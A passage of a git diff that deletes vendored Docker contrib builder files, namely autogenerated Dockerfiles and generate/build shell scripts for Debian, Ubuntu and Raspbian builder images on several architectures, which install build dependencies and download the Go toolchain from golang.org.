b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile deleted file mode 100644 index aa027f83b3..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM ubuntu:precise - -RUN apt-get update && apt-get install -y apparmor bash-completion build-essential cmake curl ca-certificates debhelper dh-apparmor git libapparmor-dev libltdl-dev libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor exclude_graphdriver_btrfs exclude_graphdriver_devicemapper pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile deleted file mode 100644 index b03a853ed6..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile deleted file mode 100644 index af03f6226f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile deleted file mode 100644 index 5ac1edf1a4..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"! -# - -FROM ubuntu:yakkety - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile deleted file mode 100644 index a4ac781eb9..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile +++ /dev/null @@ -1,20 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! -# - -FROM armhf/debian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh deleted file mode 100755 index e110a219ab..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh +++ /dev/null @@ -1,158 +0,0 @@ -#!/bin/bash -set -e - -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh debian-jessie -# to only update debian-jessie/Dockerfile -# or: ./generate.sh debian-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - distro="${version%-*}" - suite="${version##*-}" - from="${distro}:${suite}" - - case "$from" in - raspbian:jessie) - from="resin/rpi-raspbian:jessie" - ;; - *) - from="armhf/$from" - ;; - esac - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! - # - - FROM $from - EOF - - echo >> "$version/Dockerfile" - - if [[ "$distro" = "debian" || "$distro" = "raspbian" ]]; then - cat >> "$version/Dockerfile" <<-'EOF' - # allow replacing httpredir or deb mirror - ARG APT_MIRROR=deb.debian.org - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - EOF - - if [ "$suite" = "wheezy" ]; then - cat >> "$version/Dockerfile" <<-'EOF' - RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list - EOF - fi - - echo "" >> "$version/Dockerfile" - fi - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libseccomp-dev # for "seccomp.h" & "libseccomp.so" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - # packaging for "sd-journal.h" and libraries varies - case "$suite" in - precise|wheezy) ;; - jessie|trusty) packages+=( libsystemd-journal-dev );; - *) packages+=( libsystemd-dev );; - esac - - # debian wheezy & ubuntu precise do not have the right libseccomp libs - # debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :( - case "$suite" in - precise|wheezy|jessie|trusty) - packages=( "${packages[@]/libseccomp-dev}" ) - runcBuildTags="apparmor selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor seccomp selinux" - ;; - esac - - - if [ "$suite" = 'precise' ]; then - # precise has a few package issues - - # - dh-systemd doesn't exist at all - packages=( "${packages[@]/dh-systemd}" ) - - # - libdevmapper-dev is missing critical structs (too old) - packages=( "${packages[@]/libdevmapper-dev}" ) - extraBuildTags+=' exclude_graphdriver_devicemapper' - - # - btrfs-tools is missing "ioctl.h" (too old), so it's useless - # (since kernels on precise are old too, just skip btrfs entirely) - packages=( "${packages[@]/btrfs-tools}" ) - extraBuildTags+=' exclude_graphdriver_btrfs' - fi - - if [ "$suite" = 'wheezy' ]; then - # pull a couple packages from backports explicitly - # (build failures otherwise) - backportsPackages=( btrfs-tools ) - for pkg in "${backportsPackages[@]}"; do - packages=( "${packages[@]/$pkg}" ) - done - echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - fi - - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - if [ "$distro" == 'raspbian' ]; - then - cat <> "$version/Dockerfile" -# GOARM is the ARM architecture version which is unrelated to the above Golang version -ENV GOARM 6 -EOF - fi - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile deleted file mode 100644 index 4dbfd093d8..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile +++ /dev/null @@ -1,22 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! -# - -FROM resin/rpi-raspbian:jessie - -# allow replacing httpredir or deb mirror -ARG APT_MIRROR=deb.debian.org -RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -# GOARM is the ARM architecture version which is unrelated to the above Golang version -ENV GOARM 6 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile deleted file mode 100644 index b36c1dac71..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! -# - -FROM armhf/ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile deleted file mode 100644 index b5e55ad2dd..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! -# - -FROM armhf/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile deleted file mode 100644 index 69c2e7f2d4..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"! -# - -FROM armhf/ubuntu:yakkety - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh deleted file mode 100755 index 7d22e8c47f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh deleted file mode 100755 index 0e20b9c4b5..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh +++ /dev/null @@ -1,103 +0,0 @@ -#!/bin/bash -set -e - -# This file is used to auto-generate Dockerfiles for making debs via 'make deb' -# -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh ubuntu-xenial -# to only update ubuntu-xenial/Dockerfile -# or: ./generate.sh ubuntu-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - echo "${versions[@]}" - distro="${version%-*}" - suite="${version##*-}" - from="ppc64le/${distro}:${suite}" - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! - # - - FROM $from - - EOF - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - vim-common # tini dep - ) - - case "$suite" in - trusty) - packages+=( libsystemd-journal-dev ) - ;; - *) - # libseccomp isn't available until ubuntu xenial and is required for "seccomp.h" & "libseccomp.so" - packages+=( libseccomp-dev ) - packages+=( libsystemd-dev ) - ;; - esac - - # buildtags - case "$suite" in - # trusty has no seccomp package - trusty) - runcBuildTags="apparmor selinux" - ;; - # ppc64le support was backported into libseccomp 2.2.3-2, - # so enable seccomp by default - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor seccomp selinux" - ;; - esac - - # update and install packages - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.ppc64le >> "$version/Dockerfile" - echo 'RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile deleted file mode 100644 index 4182d683b0..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! -# - -FROM ppc64le/ubuntu:trusty - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile deleted file mode 100644 index f1521db72f..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! -# - -FROM ppc64le/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile deleted file mode 100644 index 4f8cc66769..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"! -# - -FROM ppc64le/ubuntu:yakkety - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libsqlite3-dev pkg-config vim-common libseccomp-dev libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux -ENV RUNC_BUILDTAGS apparmor seccomp selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh deleted file mode 100755 index 8271d9dc47..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-deb:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh deleted file mode 100755 index b8f5860844..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh +++ /dev/null @@ -1,96 +0,0 @@ -#!/bin/bash -set -e - -# This file is used to auto-generate Dockerfiles for making debs via 'make deb' -# -# usage: ./generate.sh [versions] -# ie: ./generate.sh -# to update all Dockerfiles in this directory -# or: ./generate.sh ubuntu-xenial -# to only update ubuntu-xenial/Dockerfile -# or: ./generate.sh ubuntu-newversion -# to create a new folder and a Dockerfile within it - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -versions=( "$@" ) -if [ ${#versions[@]} -eq 0 ]; then - versions=( */ ) -fi -versions=( "${versions[@]%/}" ) - -for version in "${versions[@]}"; do - echo "${versions[@]}" - distro="${version%-*}" - suite="${version##*-}" - from="s390x/${distro}:${suite}" - - mkdir -p "$version" - echo "$version -> FROM $from" - cat > "$version/Dockerfile" <<-EOF - # - # THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! - # - - FROM $from - - EOF - - extraBuildTags='pkcs11' - runcBuildTags= - - # this list is sorted alphabetically; please keep it that way - packages=( - apparmor # for apparmor_parser for testing the profile - bash-completion # for bash-completion debhelper integration - btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible) - build-essential # "essential for building Debian packages" - cmake # tini dep - curl ca-certificates # for downloading Go - debhelper # for easy ".deb" building - dh-apparmor # for apparmor debhelper - dh-systemd # for systemd debhelper integration - git # for "git commit" info in "docker -v" - libapparmor-dev # for "sys/apparmor.h" - libdevmapper-dev # for "libdevmapper.h" - libltdl-dev # for pkcs11 "ltdl.h" - libseccomp-dev # for "seccomp.h" & "libseccomp.so" - libsqlite3-dev # for "sqlite3.h" - pkg-config # for detecting things like libsystemd-journal dynamically - libsystemd-dev - vim-common # tini dep - ) - - case "$suite" in - # s390x needs libseccomp 2.3.1 - xenial) - # Ubuntu Xenial has libseccomp 2.2.3 - runcBuildTags="apparmor selinux" - ;; - *) - extraBuildTags+=' seccomp' - runcBuildTags="apparmor selinux seccomp" - ;; - esac - - # update and install packages - echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile" - echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile" - echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile" - - echo >> "$version/Dockerfile" - - # print build tags in alphabetical order - buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' ) - - echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile" - echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile deleted file mode 100644 index 6d7e4c574b..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -# -# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"! -# - -FROM s390x/ubuntu:xenial - -RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config libsystemd-dev vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/* - -ENV GO_VERSION 1.7.5 -RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local -ENV PATH $PATH:/usr/local/go/bin - -ENV AUTO_GOPATH 1 - -ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux -ENV RUNC_BUILDTAGS apparmor selinux diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md deleted file mode 100644 index 5f2e888c7a..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md +++ /dev/null @@ -1,5 +0,0 @@ -# `dockercore/builder-rpm` - -This image's tags contain the dependencies for building Docker `.rpm`s for each of the RPM-based platforms Docker targets. - -To add new tags, see [`contrib/builder/rpm/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/rpm/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file. diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh deleted file mode 100755 index 558f7ee0db..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash -set -e - -cd "$(dirname "$(readlink -f "$BASH_SOURCE")")" - -set -x -./generate.sh -for d in */; do - docker build -t "dockercore/builder-rpm:$(basename "$d")" "$d" -done diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile deleted file mode 100644 index 1f841631ca..0000000000 --- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile +++ 